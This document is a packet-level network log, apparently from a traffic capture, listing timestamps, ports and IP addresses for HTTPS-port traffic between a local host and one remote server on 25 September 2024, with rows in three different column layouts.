Sep 25, 2024 19:02:13.253391981 CEST | 49704 | 443 | 192.168.2.16 | 79.141.163.131
Sep 25, 2024 19:02:13.253422976 CEST | 443 | 49704 | 79.141.163.131 | 192.168.2.16
Sep 25, 2024 19:02:13.253459930 CEST | 49704 | 443 | 192.168.2.16 | 79.141.163.131
Sep 25, 2024 19:02:13.253509998 CEST | 49704 | 443 | 192.168.2.16 | 79.141.163.131
Sep 25, 2024 19:02:13.253768921 CEST | 443 | 49704 | 79.141.163.131 | 192.168.2.16
Sep 25, 2024 19:02:13.253812075 CEST | 443 | 49704 | 79.141.163.131 | 192.168.2.16
Sep 25, 2024 19:02:13.253911018 CEST | 49704 | 443 | 192.168.2.16 | 79.141.163.131
Sep 25, 2024 19:02:13.253911018 CEST | 49704 | 443 | 192.168.2.16 | 79.141.163.131
Sep 25, 2024 19:02:13.253926992 CEST | 443 | 49704 | 79.141.163.131 | 192.168.2.16
Sep 25, 2024 19:02:13.254379034 CEST | 443 | 49704 | 79.141.163.131 | 192.168.2.16
Sep 25, 2024 19:02:13.254441023 CEST | 443 | 49704 | 79.141.163.131 | 192.168.2.16
Sep 25, 2024 19:02:13.254488945 CEST | 49704 | 443 | 192.168.2.16 | 79.141.163.131
Sep 25, 2024 19:02:13.254501104 CEST | 443 | 49704 | 79.141.163.131 | 192.168.2.16
Sep 25, 2024 19:02:13.254544020 CEST | 49704 | 443 | 192.168.2.16 | 79.141.163.131
Sep 25, 2024 19:02:13.254723072 CEST | 49704 | 443 | 192.168.2.16 | 79.141.163.131
Sep 25, 2024 19:02:13.254899025 CEST | 443 | 49704 | 79.141.163.131 | 192.168.2.16
Sep 25, 2024 19:02:13.254939079 CEST | 443 | 49704 | 79.141.163.131 | 192.168.2.16
Sep 25, 2024 19:02:13.254985094 CEST | 49704 | 443 | 192.168.2.16 | 79.141.163.131
Sep 25, 2024 19:02:13.254997015 CEST | 443 | 49704 | 79.141.163.131 | 192.168.2.16
Sep 25, 2024 19:02:13.255033970 CEST | 49704 | 443 | 192.168.2.16 | 79.141.163.131
                                                                              Sep 25, 2024 19:02:13.255142927 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.255635023 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.255673885 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.255714893 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.255726099 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.255754948 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.255830050 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.256309032 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.256376028 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.256419897 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.256429911 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.256462097 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.256617069 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.256705046 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.256747007 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.256789923 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.256799936 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.256835938 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.256859064 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.257464886 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.257504940 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.257551908 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.257563114 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.257595062 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.257685900 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.339987993 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.340018034 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.340126991 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.340126991 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.340147018 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.340354919 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.340379953 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.340394974 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.340405941 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.340440035 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.340440035 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.340475082 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.340887070 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.340908051 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.340987921 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.340987921 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.341000080 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.341278076 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.341300964 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.341370106 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.341370106 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.341383934 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.342044115 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.342365026 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.342385054 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.342468977 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.342468977 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.342482090 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.342644930 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.343363047 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.343393087 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.343425035 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.343436003 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.343467951 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.343749046 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.344191074 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.344211102 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.344285011 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.344285011 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.344297886 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.344856024 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.345231056 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.345253944 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.345340967 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.345340967 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.345354080 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.345913887 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.441512108 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.441551924 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.441867113 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.441926003 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.441943884 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442015886 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442056894 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442073107 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442276001 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442296028 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442316055 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442332983 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442363977 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442507982 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442730904 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442755938 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442831993 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442832947 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442847013 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442945004 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.443139076 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443159103 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443269014 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.443280935 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443358898 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.443573952 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443593979 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443912983 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443960905 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.443967104 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443993092 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.444026947 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.444026947 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.444205999 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.444374084 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.444394112 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.444581985 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.444593906 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.449028969 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.518141031 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.518208981 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.518279076 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.518341064 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.518377066 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.518450022 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.518537045 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.518580914 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.518629074 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.518640995 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.518683910 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.518800020 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.519001007 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.519052029 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.519079924 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.519090891 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.519135952 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.520097971 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.522294044 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.522336006 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.522387028 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.522424936 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.522464037 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.522511959 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.522738934 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.522778988 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.522830963 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.522847891 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.522887945 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.522934914 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523044109 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523083925 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523128986 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523139000 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523184061 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523238897 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523299932 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523350000 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523442030 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523453951 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523492098 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523823023 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523931026 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523972034 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.524015903 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.524028063 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.524065018 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.524179935 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607161999 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607209921 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607263088 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607280016 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607315063 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607443094 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607567072 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607606888 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607654095 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607665062 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607706070 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607795000 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607929945 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607971907 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.608015060 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.608025074 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.608071089 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.608093023 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.608906984 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.608947992 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.608989954 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.608999968 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.609044075 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.609136105 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.609278917 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.609318018 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.609405994 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.609405994 CEST49704443192.168.2.1679.141.163.131
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Sep 25, 2024 19:02:13.609421968 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.609761953 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.609810114 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.609860897 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.609874010 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.609911919 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.610121965 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.610230923 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.610275984 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.610320091 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.610331059 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.610364914 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.610430002 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.612334013 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.612375021 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.612459898 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.612459898 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.612476110 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.612584114 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.697825909 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.697889090 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.697949886 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.698012114 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.698051929 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.698309898 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.699544907 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.699588060 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.699632883 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.699645996 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.699673891 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.699709892 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.700805902 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.700850964 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.700938940 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.700938940 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.700953960 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.701184988 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.701436043 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.701478958 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.701538086 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.701549053 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.701591969 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.701663017 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.701925039 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.701966047 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.702011108 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.702020884 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.702065945 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.702099085 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.702244043 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.702297926 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.702342987 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.702353954 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.702389956 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.702424049 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.702636003 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.702678919 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.702723980 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.702733994 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.702765942 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.702996016 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.703484058 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.703527927 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.703572035 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.703582048 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.703625917 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.703705072 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.784070969 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.784115076 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.784230947 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.784230947 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.784265995 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.785116911 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.785763025 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.785805941 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.785892963 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.785893917 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.785921097 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.786113977 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.787065983 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.787108898 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.787157059 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.787168026 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.787204981 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.787242889 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.787739992 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.787780046 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.787827969 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.787838936 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.787940025 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.787940025 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.788191080 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.788233042 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.788285971 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.788295984 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.788325071 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.788374901 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.788588047 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.788630009 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.788677931 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.788687944 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.788722992 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.788743019 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.788885117 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.788925886 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.788957119 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.788966894 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.789004087 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.789815903 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.789864063 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.789865971 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.789894104 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.789910078 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.789932966 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.789978027 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.870433092 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.870496035 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.870616913 CEST  49704        443        192.168.2.16    79.141.163.131
